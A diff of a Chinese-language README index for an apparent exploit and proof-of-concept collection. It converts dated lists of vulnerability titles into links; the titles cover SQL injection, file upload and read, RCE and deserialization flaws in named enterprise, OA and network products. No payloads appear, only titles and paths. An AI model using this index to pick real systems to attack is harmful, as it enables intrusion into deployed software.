+- [海康威视综合安防管理平台clusters接口存在任意文件上传漏洞](./海康威视/海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.md)
+- [广联达OA系统接口ConfigService.asmx存在SQL注入漏洞](./广联达OA/广联达OA系统接口ConfigService.asmx存在SQL注入漏洞.md)
+- [广联达OA系统GetSSOStamp接口存在任意用户登录](./广联达OA/广联达OA系统GetSSOStamp接口存在任意用户登录.md)
+- [方天云智慧平台系统Upload.ashx存在任意文件上传漏洞](./方天云智慧平台系统/方天云智慧平台系统Upload.ashx存在任意文件上传漏洞.md)
+- [用友NC-Cloud系统queryStaffByName存在SQL注入漏洞](./用友OA/用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md)
+- [用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞](./用友OA/用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md)
+- [契约锁电子签章平台ukeysign存在远程命令执行漏洞](./契约锁电子签章系统/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md)
+- [AspCMS系统commentList.asp存在SQL注入漏洞](./AspCMS/AspCMS系统commentList.asp存在SQL注入漏洞.md)
+- [满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926)](./满客宝智慧食堂系统/满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md)
+- [万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749)](./万户OA/万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md)
+- [深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750)](./深澜计费管理系统/深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750).md)
+- [任我行协同CRM系统UploadFile存在反序列化漏洞](./任我行/任我行协同CRM系统UploadFile存在反序列化漏洞.md)
+- [方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞](./方天云智慧平台系统/方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞.md)
+- [用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞](./用友OA/用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞.md)
+- [3C环境自动监测监控系统ReadLog文件读取漏洞](./环境自动监测监控系统/3C环境自动监测监控系统ReadLog文件读取漏洞.md)
+- [ClusterControl存在任意文件读取漏洞](./ClusterControl/ClusterControl存在任意文件读取漏洞.md)
+- [泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞](./泛微OA/泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞.md)
+- [致远互联FE协作办公平台apprvaddNew存在sql注入漏洞](./致远OA/致远互联FE协作办公平台apprvaddNew存在sql注入漏洞.md)
+- [赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞](./赛蓝企业管理系统/赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞.md)
 
 ## 2024.07.30 新增漏洞
 
-- RAISECOM网关设备list_base_config.php存在远程命令执行漏洞
-- 用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞
-- 用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞
-- 用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞
-- 用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞
-- 用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞
-- 用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞
-- 拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞
-- 方天云智慧平台系统GetCompanyItem存在sql注入漏洞
-- 用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞
-- 泛微e-cology接口HrmService前台SQL注入漏洞
-- 杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞
-- 用友U9系统DoQuery接口存在SQL注入
-- 泛微ecology系统setup接口存在信息泄露漏洞
-- eking管理易FileUpload接口存在任意文件上传漏洞
-- SpringBlade系统menu接口存在SQL注入漏洞
-- JeecgBoot反射型XSS漏洞
+- [RAISECOM网关设备list_base_config.php存在远程命令执行漏洞](./RAISECOM网关设备/RAISECOM网关设备list_base_config.php存在远程命令执行漏洞.md)
+- [用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞.md)
+- [用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md)
+- [用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md)
+- [用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md)
+- [用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md)
+- [用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md)
+- [拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞](./拓尔思TRS媒资管理系统/拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞.md)
+- [方天云智慧平台系统GetCompanyItem存在sql注入漏洞](./方天云智慧平台系统/方天云智慧平台系统GetCompanyItem存在sql注入漏洞.md)
+- [用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞](./用友OA/用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞.md)
+- [泛微e-cology接口HrmService前台SQL注入漏洞](./泛微OA/泛微e-cology接口HrmService前台SQL注入漏洞.md)
+- [杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞](./杭州雄威餐厅数字化综合管理平台/杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞.md)
+- [用友U9系统DoQuery接口存在SQL注入](./用友OA/用友U9系统DoQuery接口存在SQL注入.md)
+- [泛微ecology系统setup接口存在信息泄露漏洞](./泛微OA/泛微ecology系统setup接口存在信息泄露漏洞.md)
+- [eking管理易FileUpload接口存在任意文件上传漏洞](./eking管理易/eking管理易FileUpload接口存在任意文件上传漏洞.md)
+- [SpringBlade系统menu接口存在SQL注入漏洞](./SpringBlade/SpringBlade系统menu接口存在SQL注入漏洞.md)
+- [JeecgBoot反射型XSS漏洞](./JeecgBoot/JeecgBoot反射型XSS漏洞.md)
 
 ## 2024.07.27 新增漏洞
 
-- 金和OA-C6-GeneralXmlhttpPage.aspx存在SQL注入漏洞
-- 汇智ERP接口filehandle.aspx存在任意文件读取漏洞
-- 赛蓝企业管理系统GetJSFile存在任意文件读取漏洞
-- 赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞
-- 通达OAV11.10接口login.php存在SQL注入漏洞
-- 泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112)
-- 宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞
-- Sharp多功能打印机未授权访问漏洞
-- 天问物业ERP系统ContractDownLoad存在任意文件读取漏洞
-- 金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞
-- 红海云eHR系统kgFile.mob存在任意文件上传漏洞
-- 华天动力OA系统downloadWpsFile存在任意文件读取漏洞
-- 邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞
-- 用友NC系统接口UserAuthenticationServlet存在反序列化RCE漏洞(XVE-2024-18302)
--  用友NC及U8cloud系统接口LoggingConfigServlet存在反序列化漏洞(XVE-2024-18151)
-- 金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞
-- 天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞
-- 天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞
-- 浪潮云财务系统xtdysrv.asmx存在命令执行漏洞
-- 瑞斯康达-多业务智能网关-RCE
-- 超级猫签名APP分发平台前台存在SQL注入漏洞
-- 超级猫签名APP分发平台前台远程文件写入漏洞
-- T18-1TOTOLINK-A6000R-远程命令执行漏洞
+- [金和OA-C6-GeneralXmlhttpPage.aspx存在SQL注入漏洞](./金和OA/金和OA-C6-GeneralXmlhttpPage.aspx存在SQL注入漏洞.md)
+- [汇智ERP接口filehandle.aspx存在任意文件读取漏洞](./汇智ERP/汇智ERP接口filehandle.aspx存在任意文件读取漏洞.md)
+- [赛蓝企业管理系统GetJSFile存在任意文件读取漏洞](./赛蓝企业管理系统/赛蓝企业管理系统GetJSFile存在任意文件读取漏洞.md)
+- [赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞](./赛蓝企业管理系统/赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞.md)
+- [通达OAV11.10接口login.php存在SQL注入漏洞](./通达OA/通达OAV11.10接口login.php存在SQL注入漏洞.md)
+- [泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112)](./泛微OA/泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112).md)
+- [宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞](./宏脉医美行业管理系统/宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞.md)
+- [Sharp多功能打印机未授权访问漏洞](./Sharp/Sharp多功能打印机未授权访问漏洞.md)
+- [天问物业ERP系统ContractDownLoad存在任意文件读取漏洞](./天问物业ERP系统/天问物业ERP系统ContractDownLoad存在任意文件读取漏洞.md)
+- [金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞](./金慧综合管理信息系统/金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞.md)
+- [红海云eHR系统kgFile.mob存在任意文件上传漏洞](./红海云eHR/红海云eHR系统kgFile.mob存在任意文件上传漏洞.md)
+- [华天动力OA系统downloadWpsFile存在任意文件读取漏洞](./华天动力/华天动力OA系统downloadWpsFile存在任意文件读取漏洞.md)
+- [邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞](./邦永PM2项目管理系统/邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞.md)
+- [用友NC系统接口UserAuthenticationServlet存在反序列化RCE漏洞(XVE-2024-18302)](./用友OA/用友NC系统接口UserAuthenticationServlet存在反序列化RCE漏洞(XVE-2024-18302).md)
+- [ 用友NC及U8cloud系统接口LoggingConfigServlet存在反序列化漏洞(XVE-2024-18151)](./用友OA/用友NC及U8cloud系统接口LoggingConfigServlet存在反序列化漏洞(XVE-2024-18151).md)
+- [金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞](./金万维-云联应用系统/金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞.md)
+- [天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞](./天问物业ERP系统/天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞.md)
+- [天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞](./天问物业ERP系统/天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞.md)
+- [浪潮云财务系统xtdysrv.asmx存在命令执行漏洞](./浪潮云/浪潮云财务系统xtdysrv.asmx存在命令执行漏洞.md)
+- [瑞斯康达-多业务智能网关-RCE](./瑞斯康达/瑞斯康达-多业务智能网关-RCE.md)
+- [超级猫签名APP分发平台前台存在SQL注入漏洞](./超级猫签名APP分发平台/超级猫签名APP分发平台前台存在SQL注入漏洞.md)
+- [超级猫签名APP分发平台前台远程文件写入漏洞](./超级猫签名APP分发平台/超级猫签名APP分发平台前台远程文件写入漏洞.md)
+- [T18-1TOTOLINK-A6000R-远程命令执行漏洞](./路由器/T18-1TOTOLINK-A6000R-远程命令执行漏洞.md)
 
 ## 2024.07.24 新增漏洞
 
-- 通天星CMSV6车载视频监控平台disable存在SQL注入
-- 创客13星零售商城系统前台任意文件上传漏洞
-- 建文工程管理系统BusinessManger.ashx存在SQL注入漏洞
-- 天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞
-- 致远OA系统constDef接口存在代码执行漏洞
-- 启明星辰天玥网络安全审计系统SQL注入漏洞
-- Bazarr任意文件读取(CVE-2024-40348)
-- 浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞
-- 建文工程管理系统desktop.ashx存在SQL注入漏洞
-- 帆软系统ReportServer存在SQL注入漏洞导致RCE
-- WVP视频平台(国标28181)未授权SQL注入漏洞
-- 用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞
-- 锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞
-- 华磊科技物流modifyInsurance存在sql注入漏洞
-- 华磊科技物流getOrderTrackingNumber存在sql注入漏洞
-- 泛微E-Mobile系统接口installOperate.do存在SSRF漏洞
-- 润乾报表dataSphereServlet接口存在任意文件读取漏洞
-- 联软安渡系统接口queryLinklnfo存在SQL注入漏洞
-- 科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞
-- 科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞
-- Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107)
-- 飞讯云MyImportData前台SQL注入(XVE-2024-18113)
-- 资管云comfileup.php前台文件上传漏洞(XVE-2024-18154)
+- [通天星CMSV6车载视频监控平台disable存在SQL注入](./通天星/通天星CMSV6车载视频监控平台disable存在SQL注入.md)
+- [创客13星零售商城系统前台任意文件上传漏洞](./创客13星零售商城系统/创客13星零售商城系统前台任意文件上传漏洞.md)
+- [建文工程管理系统BusinessManger.ashx存在SQL注入漏洞](./建文工程管理系统/建文工程管理系统BusinessManger.ashx存在SQL注入漏洞.md)
+- [天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞](./天问物业ERP系统/天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞.md)
+- [致远OA系统constDef接口存在代码执行漏洞](./致远OA/致远OA系统constDef接口存在代码执行漏洞.md)
+- [启明星辰天玥网络安全审计系统SQL注入漏洞](./启明星辰/启明星辰天玥网络安全审计系统SQL注入漏洞.md)
+- [Bazarr任意文件读取(CVE-2024-40348)](./Bazarr/Bazarr任意文件读取(CVE-2024-40348).md)
+- [浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞](./浪潮云/浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞.md)
+- [建文工程管理系统desktop.ashx存在SQL注入漏洞](./建文工程管理系统/建文工程管理系统desktop.ashx存在SQL注入漏洞.md)
+- [帆软系统ReportServer存在SQL注入漏洞导致RCE](./帆软报表/帆软系统ReportServer存在SQL注入漏洞导致RCE.md)
+- [WVP视频平台(国标28181)未授权SQL注入漏洞](./WVP视频平台/WVP视频平台(国标28181)未授权SQL注入漏洞.md)
+- [用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞](./用友OA/用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞.md)
+- [锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞](./锐捷/锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞.md)
+- [华磊科技物流modifyInsurance存在sql注入漏洞](./华磊科技物流/华磊科技物流modifyInsurance存在sql注入漏洞.md)
+- [华磊科技物流getOrderTrackingNumber存在sql注入漏洞](./华磊科技物流/华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md)
+- [泛微E-Mobile系统接口installOperate.do存在SSRF漏洞](./泛微OA/泛微E-Mobile系统接口installOperate.do存在SSRF漏洞.md)
+- [润乾报表dataSphereServlet接口存在任意文件读取漏洞](./润乾报表/润乾报表dataSphereServlet接口存在任意文件读取漏洞.md)
+- [联软安渡系统接口queryLinklnfo存在SQL注入漏洞](./联软/联软安渡系统接口queryLinklnfo存在SQL注入漏洞.md)
+- [科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞](./科讯图书馆综合管理云平台/科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞.md)
+- [科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞](./科讯图书馆综合管理云平台/科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞.md)
+- [Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107)](./Apache/Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md)
+- [飞讯云MyImportData前台SQL注入(XVE-2024-18113)](./飞讯云/飞讯云MyImportData前台SQL注入(XVE-2024-18113).md)
+- [资管云comfileup.php前台文件上传漏洞(XVE-2024-18154)](./资管云/资管云comfileup.php前台文件上传漏洞(XVE-2024-18154).md)
 
 ## 2024.07.20 新增漏洞
 
-- WebLogic远程代码执行漏洞(CVE-2024-21006)
-- 广联达OA接口ArchiveWebService存在XML实体注入漏洞
-- 亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞
-- 亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞
-- 云课网校系统文件上传漏洞(DVB-2024-6594)
-- 全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞
-- 1Panel面板最新前台RCE漏洞(CVE-2024-39911)
-- 用友CRM客户关系管理系统import.php存在任意文件上传漏洞
-- 致远互联AnalyticsCloud分析云存在任意文件读取漏洞
-- 海洋CMS后台admin_smtp.php存在远程代码执行漏洞
-- DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞
-- DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞
-- fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914)
-- LiveNVR流媒体服务软件接口存在未授权访问漏洞
-- 拼团零售商城系统前台任意文件写入漏洞
+- [WebLogic远程代码执行漏洞(CVE-2024-21006)](./Weblogic/WebLogic远程代码执行漏洞(CVE-2024-21006).md)
+- [广联达OA接口ArchiveWebService存在XML实体注入漏洞](./广联达OA/广联达OA接口ArchiveWebService存在XML实体注入漏洞.md)
+- [亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞.md)
+- [亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞.md)
+- [云课网校系统文件上传漏洞(DVB-2024-6594)](./云课网校系统/云课网校系统文件上传漏洞(DVB-2024-6594).md)
+- [全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞](./全息AI网络运维平台/全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞.md)
+- [1Panel面板最新前台RCE漏洞(CVE-2024-39911)](./1Panel/1Panel面板最新前台RCE漏洞(CVE-2024-39911).md)
+- [用友CRM客户关系管理系统import.php存在任意文件上传漏洞](./用友OA/用友CRM客户关系管理系统import.php存在任意文件上传漏洞.md)
+- [致远互联AnalyticsCloud分析云存在任意文件读取漏洞](./致远OA/致远互联AnalyticsCloud分析云存在任意文件读取漏洞.md)
+- [海洋CMS后台admin_smtp.php存在远程代码执行漏洞](./海洋cms/海洋CMS后台admin_smtp.php存在远程代码执行漏洞.md)
+- [DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞](./dede/DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞.md)
+- [DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞](./dede/DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞.md)
+- [fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914)](./fogproject/fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914).md)
+- [LiveNVR流媒体服务软件接口存在未授权访问漏洞](./LiveNVR流媒体服务软件/LiveNVR流媒体服务软件接口存在未授权访问漏洞.md)
+- [拼团零售商城系统前台任意文件写入漏洞](./拼团零售商城系统/拼团零售商城系统前台任意文件写入漏洞.md)
 
 ## 2024.07.17 新增漏洞
 
-- Nacos远程代码执行漏洞
-- 蓝凌KEP前台RCE漏洞
-- 某自动发卡网alipay_notify.php存在SQL注入漏洞
-- 赛蓝企业管理系统GetExcellTemperature存在SQL注入漏洞
-- SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412)
-- Netgear-WN604接口downloadFile.php信息泄露漏洞(CVE-2024-6646)
-- 泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞
-- 泛微E-office-10接口leave_record.php存在SQL注入漏洞
-- 用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞
-- 用友NC-Cloud文件服务器用户登陆绕过漏洞
+- [Nacos远程代码执行漏洞](./Nacos/Nacos远程代码执行漏洞.md)
+- [蓝凌KEP前台RCE漏洞](./蓝凌OA/蓝凌KEP前台RCE漏洞.md)
+- [某自动发卡网alipay_notify.php存在SQL注入漏洞](./发卡网系统/某自动发卡网alipay_notify.php存在SQL注入漏洞.md)
+- [赛蓝企业管理系统GetExcellTemperature存在SQL注入漏洞](./赛蓝企业管理系统/赛蓝企业管理系统GetExcellTemperature存在SQL注入漏洞.md)
+- [SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412)](./SuiteCRM/SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412).md)
+- [Netgear-WN604接口downloadFile.php信息泄露漏洞(CVE-2024-6646)](./路由器/Netgear-WN604接口downloadFile.php信息泄露漏洞(CVE-2024-6646).md)
+- [泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞](./泛微OA/泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞.md)
+- [泛微E-office-10接口leave_record.php存在SQL注入漏洞](./泛微OA/泛微E-office-10接口leave_record.php存在SQL注入漏洞.md)
+- [用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞](./用友OA/用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞.md)
+- [用友NC-Cloud文件服务器用户登陆绕过漏洞](./用友OA/用友NC-Cloud文件服务器用户登陆绕过漏洞.md)
 
 ## 2024.07.14 新增漏洞
 
-- 新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞
-- 金斗云-HKMP智慧商业软件download任意文件读取漏洞
-- 公众号无限回调系统接口siteUrl存在SQL注入漏洞
-- 用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞
-- ServiceNow-UI存在Jelly模板注入漏洞(CVE-2024-4879)
-- 天喻软件数据安全平台DownLoad.ashx存在SQL注入
-- 启明星辰-天清汉马VPN接口download任意文件读取
-- 泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞
-- 全行业小程序运营系统接口Wxapps.php存在任意文件上传漏洞
+- [新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞](./新中新中小学智慧校园信息管理系统/新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞.md)
+- [金斗云-HKMP智慧商业软件download任意文件读取漏洞](./金斗云/金斗云-HKMP智慧商业软件download任意文件读取漏洞.md)
+- [公众号无限回调系统接口siteUrl存在SQL注入漏洞](./公众号无限回调系统/公众号无限回调系统接口siteUrl存在SQL注入漏洞.md)
+- [用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞.md)
+- [ServiceNow-UI存在Jelly模板注入漏洞(CVE-2024-4879)](./ServiceNow%20UI/ServiceNow-UI存在Jelly模板注入漏洞(CVE-2024-4879).md)
+- [天喻软件数据安全平台DownLoad.ashx存在SQL注入](./天喻软件数据安全平台/天喻软件数据安全平台DownLoad.ashx存在SQL注入.md)
+- [启明星辰-天清汉马VPN接口download任意文件读取](./启明星辰/启明星辰-天清汉马VPN接口download任意文件读取.md)
+- [泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞](./泛微OA/泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞.md)
+- [全行业小程序运营系统接口Wxapps.php存在任意文件上传漏洞](./全行业小程序运营系统/全行业小程序运营系统接口Wxapps.php存在任意文件上传漏洞.md)
 
 ## 2024.07.12 新增漏洞
 
-- 泛微E-Cology接口getFileViewUrl存在SSRF漏洞
-- Pyspider-WebUI未授权访问致远程代码执行漏洞
-- 赛蓝企业管理系统DownloadBuilder任意文件读取漏洞
-- 上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞
-- 同享人力管理管理平台DownloadFile存在任意文件下载漏洞
-- 北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞
-- 用友NC-Cloud接口blobRefClassSea存在反序列化漏洞
-- 慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞
-- 虚拟仿真实验室系统FileUploadServlet存在任意文件上传漏洞
-- 风速科技统一认证平台存在密码重置漏洞
-- 联奕统一身份认证平台getDataSource存在信息泄露漏洞
-- PowerCreator接口UploadResourcePic.ashx存在任意文件上传漏洞
-- 数字通OA-智慧政务接口payslip存在SQL注入漏洞
+- [泛微E-Cology接口getFileViewUrl存在SSRF漏洞](./泛微OA/泛微E-Cology接口getFileViewUrl存在SSRF漏洞.md)
+- [Pyspider-WebUI未授权访问致远程代码执行漏洞](./Pyspider%20WebUI/Pyspider-WebUI未授权访问致远程代码执行漏洞.md)
+- [赛蓝企业管理系统DownloadBuilder任意文件读取漏洞](./赛蓝企业管理系统/赛蓝企业管理系统DownloadBuilder任意文件读取漏洞.md)
+- [上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞](./上讯信息技术股份有限公司/上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞.md)
+- [同享人力管理管理平台DownloadFile存在任意文件下载漏洞](./同享人力管理管理平台/同享人力管理管理平台DownloadFile存在任意文件下载漏洞.md)
+- [北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞](./北京中科聚网/北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞.md)
+- [用友NC-Cloud接口blobRefClassSea存在反序列化漏洞](./用友OA/用友NC-Cloud接口blobRefClassSea存在反序列化漏洞.md)
+- [慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞](./慧学教育科技有限公司/慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞.md)
+- [虚拟仿真实验室系统FileUploadServlet存在任意文件上传漏洞](./虚拟仿真实验室系统/虚拟仿真实验室系统FileUploadServlet存在任意文件上传漏洞.md)
+- [风速科技统一认证平台存在密码重置漏洞](./风速科技统一认证平台/风速科技统一认证平台存在密码重置漏洞.md)
+- [联奕统一身份认证平台getDataSource存在信息泄露漏洞](./联奕统一身份认证平台/联奕统一身份认证平台getDataSource存在信息泄露漏洞.md)
+- [PowerCreator接口UploadResourcePic.ashx存在任意文件上传漏洞](./PowerCreator/PowerCreator接口UploadResourcePic.ashx存在任意文件上传漏洞.md)
+- [数字通OA-智慧政务接口payslip存在SQL注入漏洞](./数字通OA/数字通OA-智慧政务接口payslip存在SQL注入漏洞.md)
 
 ## 2024.07.09 新增漏洞
 
-- 申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞
-- EduSoho教培系统classropm-course-statistics存在任意文件读取漏洞
-- 深澜计费管理系统proxy存在任意文件读取漏洞
-- 深澜计费管理系统strategy存在反序列化RCE漏洞
-- 大唐电信NVS3000综合视频监控平台getDepResList存在SQL注入漏洞
-- 大唐电信AC集中管理平台敏感信息泄漏漏洞
-- 大唐电信NVS3000综合视频监控平台getencoderlist存在未授权访问漏洞
-- 厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞
-- 中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞
-- 亿华人力资源管理系统unloadfile存在任意文件上传漏洞
-- EnjoyRMIS-GetOAById存在SQL注入漏洞
-- 亿渡留言管理系统uploadimg存在任意文件上传漏洞
-- 宏脉医美行业管理系统UEditor编辑器存在文件上传漏洞
-- Exam在线考试系统存在前台任意文件上传漏洞
-- 彩票系统存在任意文件preview.php上传漏洞
-- 会捷通云视讯平台fileDownload存在任意文件读取漏洞
-- 正方数字化校园平台RzptManage存在任意文件写入漏洞
-- 鲸发卡系统自动发卡网request_post存在任意文件读取漏洞
-- 用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞
+- [申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞](./申瓯通信在线录音管理系统/申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞.md)
+- [EduSoho教培系统classropm-course-statistics存在任意文件读取漏洞](./EduSoho/EduSoho教培系统classropm-course-statistics存在任意文件读取漏洞.md)
+- [深澜计费管理系统proxy存在任意文件读取漏洞](./深澜计费管理系统/深澜计费管理系统proxy存在任意文件读取漏洞.md)
+- [深澜计费管理系统strategy存在反序列化RCE漏洞](./深澜计费管理系统/深澜计费管理系统strategy存在反序列化RCE漏洞.md)
+- [大唐电信NVS3000综合视频监控平台getDepResList存在SQL注入漏洞](./大唐电信/大唐电信NVS3000综合视频监控平台getDepResList存在SQL注入漏洞.md)
+- [大唐电信AC集中管理平台敏感信息泄漏漏洞](./大唐电信/大唐电信AC集中管理平台敏感信息泄漏漏洞.md)
+- [大唐电信NVS3000综合视频监控平台getencoderlist存在未授权访问漏洞](./大唐电信/大唐电信NVS3000综合视频监控平台getencoderlist存在未授权访问漏洞.md)
+- [厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞](./厦门四信通信科技有限公司/厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞.md)
+- [中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞](./中科智远科技综合监管云平台/中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞.md)
